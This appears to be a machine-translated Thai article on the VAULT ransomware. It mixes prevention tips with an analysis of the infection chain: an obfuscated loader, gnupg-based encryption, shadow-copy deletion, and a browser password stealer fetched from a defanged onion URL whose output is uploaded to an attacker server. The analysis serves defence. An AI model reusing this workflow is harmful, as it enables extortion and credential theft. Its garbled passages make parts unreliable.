อย่าเรียกใช้แอปพลิเคชันที่ไม่คุ้นเคย ไม่ว่าจะในอีเมล หรือดาวน์โหลดจากอินเทอร์เน็ต พยายามอย่าดาวน์โหลดหรือเรียกใช้อะไรจากอินเทอร์เน็ตเลย ขณะนี้มีสิ่งน่ารังเกียจมากมายวางอยู่รอบ ๆ ถังขยะไฟล์ซึ่งแทบจะเป็นไปไม่ได้เลยที่จะปกป้องพวกเขาโดยปราศจากความเข้าใจที่ถูกต้อง ถามคนรู้จักที่มีความสามารถดีกว่าเพื่อค้นหาบางสิ่งสำหรับคุณบนอินเทอร์เน็ตและขอบคุณเขาสำหรับสิ่งนั้น

สำรองข้อมูลสำคัญไว้เสมอ ยิ่งไปกว่านั้น คุณต้องเก็บมันไว้โดยไม่เชื่อมต่อกับคอมพิวเตอร์หรือเครือข่ายของคุณ เก็บแท่ง USB หรืออุปกรณ์ภายนอกไว้ต่างหาก HDDสำหรับสำเนาจดหมายเหตุ เสียบเข้ากับคอมพิวเตอร์ของคุณสัปดาห์ละครั้ง คัดลอกไฟล์ ถอดปลั๊ก และอย่าใช้อีก สำหรับความต้องการในชีวิตประจำวันให้ซื้ออุปกรณ์แยกต่างหากซึ่งตอนนี้มีราคาไม่แพงมากไม่ต้องประหยัด ในยุคปัจจุบัน เทคโนโลยีสารสนเทศข้อมูลเป็นทรัพยากรที่มีค่าที่สุด สำคัญกว่าสื่อ การซื้อแท่ง USB พิเศษดีกว่าการทำข้อมูลสำคัญหาย

ปรับปรุงความเข้าใจของคุณเกี่ยวกับกระบวนการที่เกิดขึ้นในคอมพิวเตอร์ ทุกวันนี้ คอมพิวเตอร์ แท็บเล็ต แล็ปท็อป สมาร์ทโฟน เข้ามาในชีวิตเราอย่างแน่นหนาจนไม่สามารถเข้าใจสิ่งเหล่านี้ได้ หมายถึงการล้าหลังจังหวะชีวิตสมัยใหม่ ไม่มีโปรแกรมป้องกันไวรัสและผู้เชี่ยวชาญคนไหนที่สามารถปกป้องข้อมูลของคุณได้ หากคุณไม่ได้เรียนรู้วิธีทำด้วยตัวเอง ใช้เวลาในการอ่านบทความคุณลักษณะในหัวข้อ ความปลอดภัยของข้อมูล, ใช้หลักสูตรที่เหมาะสม, ปรับปรุงของคุณ ความรู้คอมพิวเตอร์... มันจะมีประโยชน์ในชีวิตสมัยใหม่อย่างแน่นอน

VAULT ransomware ปรากฏตัวครั้งแรกในรัสเซียในเดือนกุมภาพันธ์ 2015 และได้รับชื่อเสียง หนึ่งในอันตรายที่สุดและไวรัสที่รักษาไม่หาย ในเดือนพฤศจิกายน การติดเชื้อระลอกที่สองเริ่มต้นขึ้น ซึ่งมีลักษณะที่ใหญ่โตกว่า คลื่นลูกที่สามเกิดขึ้นในกลางเดือนมกราคม 2559 และมีจำนวนอุปกรณ์ที่ติดไวรัสมากกว่ารุ่นก่อนๆ

ไวรัส VAULT ransomware คืออะไร?

ไวรัส VAULT เป็นรูปแบบหนึ่งของโทรจันเข้ารหัส

การเจาะเข้าไปในคอมพิวเตอร์โดยใช้การกระทำของผู้ใช้ โปรแกรมจะเข้ารหัสข้อมูลบางประเภทด้วยอัลกอริธึมนับสิบที่มีรูปแบบเฉพาะ

ข้อมูลเดิมจะไม่ถูกลบ แต่แทนที่ด้วยความเสียหาย ซึ่งทำให้การกู้คืนข้อมูลแทบจะเป็นไปไม่ได้เลย

คีย์ซึ่งทำให้สามารถถอดรหัสข้อมูลได้จะถูกลบออกจากระบบโดยอัตโนมัติเมื่อสิ้นสุดการเข้ารหัส

เป้าหมายของผู้โจมตีคือการรีดไถเงินเพื่อแลกกับการถอดรหัสข้อมูล ในกรณีนี้ ความน่าจะเป็นของการถอดรหัสไฟล์ไม่เกิน 50%

ตัวอย่างของคอมพิวเตอร์ที่ติดไวรัส VAULT: คำขอเอกสารหลักจากคู่สัญญามาถึงอีเมลที่ใช้งานได้ หรือการแจ้งเตือนเกี่ยวกับความจำเป็นในการติดตั้งแพ็คเกจการอัพเดทจาก ConsultantPlus ไฟล์ที่มีข้อมูลอธิบายแนบมากับจดหมาย ทันทีที่เปิดไฟล์ปฏิบัติการและไฟล์เสริม กระบวนการเข้ารหัสข้อมูลจะเริ่มต้นขึ้น

VAULT เข้ารหัสไฟล์ใดบ้าง

ผู้โจมตีมีความสนใจในข้อมูลเชิงพาณิชย์ เช่นเดียวกับสื่อรูปภาพ เสียง และวิดีโอ ดังนั้น ไฟล์ที่มีนามสกุลต่อไปนี้จึงถูกโจมตี: .rar, .zip, .jpg, .psd, .doc, .xls, .ppt, .pdf, .mp3, .ogg, .avi, .mpeg, .html, .txt, ฐานข้อมูล 1C เป็นต้น

เมื่อคอมพิวเตอร์ติดไวรัส a เอกสารข้อความกับผู้ติดต่อของผู้หลอกลวง ค่าใช้จ่ายในการถอดรหัสข้อมูลแตกต่างกันไปตั้งแต่ $ 10 ถึง $ 50,000 ค่าใช้จ่ายประมาณการโดยผู้หลอกลวงหลังจากที่ผู้ใช้ได้รับการติดต่อ จำนวนเงินค่าไถ่ขึ้นอยู่กับจำนวนของข้อมูลที่เข้ารหัส ในเวลาเดียวกัน ไม่มีการรับประกันว่าข้อมูลจะถูกกู้คืนอย่างน้อยบางส่วน

จะป้องกันคอมพิวเตอร์ของคุณจากตัวเข้ารหัส VAULT ได้อย่างไร

ในกรณีส่วนใหญ่ การติดไวรัสเกิดขึ้นเมื่อไม่มีโปรแกรมป้องกันไวรัสในคอมพิวเตอร์ หรือเมื่อ รุ่นฟรีบน. ที่น่าเชื่อถือน้อยที่สุดในความเห็นของเราคือ Avast Antivirus

อย่างไรก็ตาม เจ้าของแพ็คเกจซอฟต์แวร์ป้องกันไวรัสที่ได้รับอนุญาต ซึ่งรวมถึงเวอร์ชันองค์กร มักจะตกเป็นเหยื่อ

ผู้เชี่ยวชาญด้านความปลอดภัยไอทีจาก ESET และ Dr.Web ได้พัฒนา ชุดคำแนะนำสากลที่ช่วยปกป้องคอมพิวเตอร์หรือแล็ปท็อปของคุณจากไวรัส VAULT และโทรจันแรนซัมแวร์ที่คล้ายกัน:

ติดตั้งการอัปเดตระบบปฏิบัติการที่สำคัญอย่างทันท่วงที

เลือกซอฟต์แวร์ป้องกันไวรัสที่มีไฟร์วอลล์ในตัว

ปิดการใช้งานการส่งและรับ ไฟล์ปฏิบัติการ(.exe) บนเมลเซิร์ฟเวอร์

ป้องกันการทำงานของมาโครใน Microsoft Officeหรือซอฟต์แวร์ที่คล้ายกัน

ออกกำลังกายสม่ำเสมอ สำรองข้อมูล

คัดลอกข้อมูลสำคัญไปยังสื่อภายนอก

วิธีการลบ VAULT ออกจากคอมพิวเตอร์?

บน ช่วงเวลานี้การติดไวรัส VAULT และการเข้ารหัสข้อมูลเป็นครั้งเดียวและไม่ได้ทำให้เกิดการติดไวรัสของไฟล์ระบบ ดังนั้นการสแกนด้วยยูทิลิตี้ Dr.Web CureIt ก็เพียงพอที่จะลบไวรัสออกจากระบบ อย่างไรก็ตาม คุณควรจำไว้ว่าการพยายามรักษาหรือลบไฟล์ที่ติดไวรัส รวมทั้งการติดตั้ง Windows ใหม่ จะทำให้ความสามารถในการกู้คืนข้อมูลที่เข้ารหัสเป็นโมฆะ

กล่าวคือ การลบไวรัสไม่ใช่เรื่องยาก หากคุณพร้อมที่จะมีส่วนร่วมกับข้อมูลที่เข้ารหัสไว้ตลอดไป หรือคุณมี ข้อมูลสำรองบนสื่อภายนอก

วิธีการกู้คืนไฟล์ VAULT?

ทันทีที่คุณ พบเชื้อ เราเห็นการเปลี่ยนแปลงไอคอนไฟล์และนามสกุลประเภทใหม่ เช่น .doc.vault, ปิดคอมพิวเตอร์หรือแล็ปท็อปของคุณทันที ยิ่งรันนาน ไฟล์ก็ยิ่งสูญเสียมากขึ้น

มาทำซ้ำกันเถอะ: การสแกนดิสก์ด้วยโปรแกรมป้องกันไวรัส ล้างไฟล์ ติดตั้งระบบใหม่ และเครื่องมือมาตรฐานอื่นๆ จะลดโอกาสในการถอดรหัสข้อมูลเท่านั้น

ไม่มีนักพัฒนาซอฟต์แวร์ป้องกันไวรัสยังไม่สามารถสร้างยูทิลิตี้เพื่อถอดรหัสข้อมูลที่เปิดเผยต่อ VAULT ได้

จุดคืนค่าระบบถูกทำลายโดยไวรัส มีโอกาสกู้คืน Windows จาก shadow copy โดยใช้ยูทิลิตี้ Shadow Editor เมื่อทำงานกับ Windows Vista / 7/8/10 แต่ในกรณีส่วนใหญ่ Shadow Copy ก็หายไปเช่นกัน

หากคุณมีผลิตภัณฑ์ลิขสิทธิ์ NOD32 หรือ Dr.Web คุณสามารถติดต่อ การสนับสนุนทางเทคนิคด้วยการขอถอดรหัสข้อมูล

นอกจากนี้ผู้เชี่ยวชาญแนะนำให้ติดต่อกับตำรวจด้วยคำแถลงเนื่องจากการกระทำของผู้โจมตีแสดงสัญญาณของอาชญากรรมภายใต้ศิลปะ ศิลปะ. 159.6, 163, 165, 272, 273 แห่งประมวลกฎหมายอาญาของสหพันธรัฐรัสเซีย

ผลลัพธ์ในทางปฏิบัติของการกระทำดังกล่าวจะลดลงเหลือศูนย์ ความจริงก็คือยังไม่มีวิธีกู้คืนไฟล์ที่เข้ารหัสโดย VAULT ได้ เศษซาก ทางออกเดียว : ถอดดิสก์ HDD หรือ SSD ออกจากอุปกรณ์แล้วติดตั้งใหม่ บางทีเร็ว ๆ นี้จะมีวิธีการถอดรหัสข้อมูลและสามารถกู้คืนข้อมูลได้

การติดเชื้อไวรัส ไฟล์ห้องนิรภัยถูกเข้ารหัส

ผู้ใช้รายแรกได้รับ จดหมายพร้อมข้อความเกี่ยวกับใบแจ้งยอดภาษี / มิเตอร์น้ำ / ใบแจ้งหนี้สำหรับคีย์ที่ปรึกษา.
จดหมายมีลิงก์ไปยังไฟล์ที่แนบมาจากแหล่งข้อมูล download-attach.com... (โฮสติ้งดูเหมือนว่าจะจ่ายด้วย bitcoin) ในไฟล์เก็บถาวรที่ลิงค์นี้ ที่น่าสนใจที่สุดคือ ไฟล์ js ที่สับสนด้วยชื่อที่ละเอียดมาก
เมื่อคุณเรียกใช้ใน % TEMP% ผู้ใช้หลายไฟล์ปรากฏขึ้นและสคริปต์ถูกเขียนขึ้นเพื่อเริ่มต้นระบบเพื่อเริ่ม revault.js

นี่คือไฟล์บางไฟล์ที่ได้รับการระบุ:
svchost.exe - ไบนารี gnupg หลัก
iconv.dll - ไลบรารีที่ใช้ร่วมกันเพื่อให้ gnupg ทำงาน
audiodg.exe - sDelete จาก Sysinternals Suite

การดำเนินการของไวรัส ไฟล์ห้องนิรภัยถูกเข้ารหัส

ในกรณีของเรา เมื่อคอมพิวเตอร์เริ่มทำงาน มีการเปิดตัวสคริปต์ revault.js ซึ่งเปิดไฟล์ cryptlist.cmd bat นี่ก็ด้ายขาดนิดหน่อย
แล้วมันก็เริ่ม ปลอดภัย.batทุกสิ่งที่มืดมนที่สุดกำลังเกิดขึ้นในตัวเขา
ขั้นแรก โปรแกรมสร้างใบรับรองสำหรับเข้ารหัสไฟล์บนคอมพิวเตอร์ชื่อ gk.vlt (Cellar / RSA / 1024 บิต)
จากนั้นจะส่งออกคีย์ส่วนตัวจากมัน ซึ่งจำเป็นสำหรับการถอดรหัสไฟล์ ไปยังไฟล์ vaultkey.vlt
จากนั้นจะสร้างคีย์สาธารณะ pk.vlt ซึ่งกำหนดไว้ล่วงหน้าในไฟล์ bat ด้วยความช่วยเหลือของไฟล์นี้ คีย์ที่จำเป็นในการถอดรหัสข้อมูลของคุณจะถูกเข้ารหัสในอนาคต

เพิ่มเติมใน vaultkey.vlt จะถูกเขียน
BDATE - วันที่ปัจจุบัน
UNAME - ชื่อผู้ใช้ปัจจุบัน
CNAME - ชื่อคอมพิวเตอร์
ULANG - ภาษาของระบบ (ในกรณีนี้จะลงทะเบียนใน RU)
และแฮชแบบสุ่มบางส่วน 01HSH 02HSH 03HSH 04HSH 05HSH FHASH

การเข้ารหัสไวรัส ไฟล์ห้องนิรภัยถูกเข้ารหัส

การเข้ารหัสไฟล์ด้วยการแทนที่มีลักษณะดังนี้
1 - การเข้ารหัสไฟล์
2 - ย้ายไฟล์ที่เข้ารหัสไปยังตำแหน่งเดิม
3 - การเพิ่มนามสกุล .vault ให้กับไฟล์

ในขั้นตอนที่ 1 * .xls และ * จะถูกเข้ารหัส ไฟล์เอกสาร.
ในขั้นตอนที่ 2 ไฟล์ win.vbs, sdwrase.js, sdwrase.cmd จะถูกสร้างและรัน ซึ่งจะปิดการใช้งาน Shadow Copy ในระบบหากระบบเป็น Vista หรือสูงกว่า
และ * .pdf * ถูกเข้ารหัส ไฟล์ rtf.
ในขั้นตอนที่ 3 * .psd * .dwg * จะถูกเข้ารหัส cdr ไฟล์.
ในขั้นตอนที่ 4 ไฟล์ * .cd * .mdb * .1cd * .dbf * .sqlite จะถูกเข้ารหัส
ในขั้นตอนที่ 5 ไฟล์ * .jpg * .zip จะถูกเข้ารหัส

แต่ละไฟล์จะถูกนับ จากนั้นจำนวนไฟล์ที่เข้ารหัสของไฟล์แต่ละประเภทจะถูกบันทึกใน vaultkey.vlt
(เห็นได้ชัดว่าสำหรับการประเมินข้อมูลที่เข้ารหัสโดยทั่วไป)

ถัดไป คีย์ของผู้โจมตีจะเข้ารหัสคีย์ส่วนตัวของคุณและข้อมูลที่เก็บรวบรวมเกี่ยวกับปริมาณข้อมูล
หลังจากนั้น คีย์ของคุณที่จำเป็นในการถอดรหัสข้อมูลจะถูกลบออกด้วยการเขียนซ้ำ 16 (!) พับ

ไฟล์ของคุณได้รับการเข้ารหัสด้วยคีย์ของคุณ และคีย์ของคุณจะถูกเข้ารหัสด้วยคีย์ของผู้โจมตี

จากนั้นไฟล์ที่มีการแจ้งเตือนจะถูกสร้างขึ้น

เว็บไซต์ไวรัส ไฟล์ห้องนิรภัยถูกเข้ารหัส

ไซต์ของอาชญากรไซเบอร์โฮสต์อยู่ในเครือข่าย TOR ที่ไม่เปิดเผยตัวตนและมีเทคโนโลยีขั้นสูงสำหรับ "โครงการ" ประเภทนี้
มีความเพียบพร้อม พื้นที่ส่วนบุคคลและ "เวอร์ชันสาธิต" สำหรับ 3 ไฟล์ ซึ่งผู้โจมตีจะถอดรหัสไฟล์ที่คุณดาวน์โหลดและดาวน์โหลดจากเซิร์ฟเวอร์ของตน แต่ก่อนที่คุณจะเปิดการเข้าถึงไฟล์ ผู้บุกรุกจะดูไฟล์ด้วยตนเอง และหากเขาเห็นว่าไฟล์สำคัญ คุณจะเข้าถึงหัวข้อนี้ไม่ได้ คุณจะได้รับแจ้งเกี่ยวกับเรื่องนี้

มีแม้กระทั่งส่วนช่วยเหลือ

ชำระด้วย bitcoins เท่านั้น
คุณยังสามารถพูดคุยกับผู้เขียน การโน้มน้าวใจและการคุกคามนั้นไร้ประโยชน์ ผู้โจมตีสามารถบล็อกความสามารถในการแชทของคุณได้

รหัสผ่านจากเบราว์เซอร์ - เทคนิคการขโมยรหัสผ่านจากเบราว์เซอร์ที่ติดไวรัส ไฟล์ห้องนิรภัยถูกเข้ารหัสคอมพิวเตอร์

หลังจากสร้างไฟล์ที่มีการแจ้งเตือนแล้วจะมี "โบนัส"
สคริปต์ ultra.js และ up.vbs ถูกสร้างขึ้น
ไฟล์แรกดาวน์โหลดไฟล์จากเกตเวย์ tor2web โดยใช้ลิงก์ hxxp _ // tj2es2lrxelpknfp.onion.city/p.vlt และเปลี่ยนชื่อเป็น ssl.exe
นี่คือ Browser Password Dump v2.6 โดย SecurityXploded
มันบันทึกรหัสผ่านทั้งหมดของคุณจากเบราว์เซอร์ไปยัง cookie.vlt
ถัดไป ไฟล์ที่สองเริ่มอัปโหลดรหัสผ่านของคุณไปยังเซิร์ฟเวอร์เดียวกัน (POST ไปยังสคริปต์ /x.php)
เซิร์ฟเวอร์นี้ไม่ระบุชื่อในลักษณะเดียวกับเซิร์ฟเวอร์สำหรับการกู้คืนและการชำระเงิน (ไม่มีอะไรเพิ่มเติมในส่วนหัว เซิร์ฟเวอร์: Anon line)